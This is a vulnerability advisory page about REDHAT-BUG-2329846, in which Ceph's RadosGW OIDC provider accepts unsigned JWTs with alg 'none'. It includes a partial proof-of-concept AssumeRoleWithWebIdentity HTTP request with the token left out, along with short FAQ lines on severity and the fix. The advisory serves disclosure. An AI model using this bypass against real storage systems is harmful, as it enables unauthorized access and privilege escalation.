First published: Mon Dec 02 2024(Updated: )
This vulnerability affects the RadosGW OIDC provider by allowing attackers to bypass authentication using JWTs with "none" as the algorithm (alg). The lack of signature enforcement creates a serious risk of unauthorized access and privilege escalation. The vulnerability is probably in the RadosGW OIDC provider. PoC The HTTP request can be found below. But without the JWT: POST / HTTP/2 Host: storage.xxx.se User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0 Content-Type: application/x-www-form-urlencoded Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78 Amz-Sdk-Request: attempt=1; max=3 Content-Length: 1508 Accept-Encoding: gzip, deflate, br Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..
Affected Software | Affected Version | How to fix |
---|---|---|
Ceph RadosGW OIDC provider |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
The severity of REDHAT-BUG-2329846 is high due to the potential for unauthorized access and privilege escalation.
To fix REDHAT-BUG-2329846, update the RadosGW OIDC provider to the patched version that enforces signature validation for JWTs.
REDHAT-BUG-2329846 affects the Ceph RadosGW OIDC provider specifically.
REDHAT-BUG-2329846 allows attackers to bypass authentication using unsigned JWTs with "none" as the algorithm.
Yes, REDHAT-BUG-2329846 poses a risk of privilege escalation by allowing unauthorized users to gain elevated access.